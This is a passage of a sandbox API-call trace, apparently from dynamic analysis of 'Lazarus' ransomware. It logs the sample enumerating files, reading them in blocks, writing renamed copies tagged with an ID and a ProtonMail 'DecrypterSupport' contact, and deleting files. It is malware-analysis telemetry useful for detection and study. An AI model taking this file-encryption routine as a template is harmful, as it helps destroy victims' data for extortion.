lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0069.640] CloseHandle (hObject=0x410) returned 1 [0069.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.641] CloseHandle (hObject=0x428) returned 1 [0069.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0069.642] AreFileApisANSI () returned 1 [0069.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0069.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0069.642] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.643] GetFileType (hFile=0x428) returned 0x1 [0069.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0069.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.643] GetLastError () returned 0xb7 [0069.643] SetLastError (dwErrCode=0xb7) [0069.643] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0069.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.644] CloseHandle (hObject=0x428) returned 1 [0069.644] AreFileApisANSI () returned 1 [0069.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0069.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0069.644] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0069.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0069.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.646] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0069.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0069.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0069.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0069.647] AreFileApisANSI () returned 1 [0069.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0069.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.647] AreFileApisANSI () returned 1 [0069.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0069.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0069.647] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.647] GetFileType (hFile=0x428) returned 0x1 [0069.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0069.648] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0069.648] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0069.648] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0069.648] CloseHandle (hObject=0x428) returned 1 [0069.648] AreFileApisANSI () returned 1 [0069.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0069.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0069.648] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.648] GetFileType (hFile=0x428) returned 0x1 [0069.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0069.649] CloseHandle (hObject=0x428) returned 1 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.649] AreFileApisANSI () returned 1 [0069.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0069.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0069.650] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6)) returned 1 [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0069.650] AreFileApisANSI () returned 1 [0069.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1f0 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71ca0 [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0069.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0069.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0069.651] AreFileApisANSI () returned 1 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0069.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0069.651] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.651] GetFileType (hFile=0x428) returned 0x1 [0069.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0069.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0069.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0069.651] AreFileApisANSI () returned 1 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0069.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0069.652] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.652] GetFileType (hFile=0x410) returned 0x1 [0069.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0069.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.652] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0069.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0069.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0069.654] GetLastError () returned 0x0 [0069.654] SetLastError (dwErrCode=0x0) [0069.654] GetLastError () returned 0x0 [0069.654] SetLastError (dwErrCode=0x0) [0069.655] GetLastError () returned 0x0 [0069.655] SetLastError (dwErrCode=0x0) [0069.655] GetLastError () returned 0x0 [0069.655] SetLastError (dwErrCode=0x0) [0069.655] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.655] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.656] GetLastError () returned 0x0 [0069.656] SetLastError (dwErrCode=0x0) [0069.656] GetLastError () returned 0x0 [0069.656] SetLastError (dwErrCode=0x0) [0069.657] GetLastError () returned 0x0 [0069.657] SetLastError (dwErrCode=0x0) [0069.657] GetLastError () returned 0x0 [0069.657] SetLastError (dwErrCode=0x0) [0069.657] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.657] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.657] GetLastError () returned 0x0 [0069.657] SetLastError (dwErrCode=0x0) [0069.657] GetLastError () returned 0x0 [0069.657] SetLastError (dwErrCode=0x0) [0069.657] GetLastError () returned 0x0 [0069.657] SetLastError (dwErrCode=0x0) [0069.658] GetLastError () returned 0x0 [0069.658] SetLastError (dwErrCode=0x0) [0069.658] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.658] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.658] GetLastError () returned 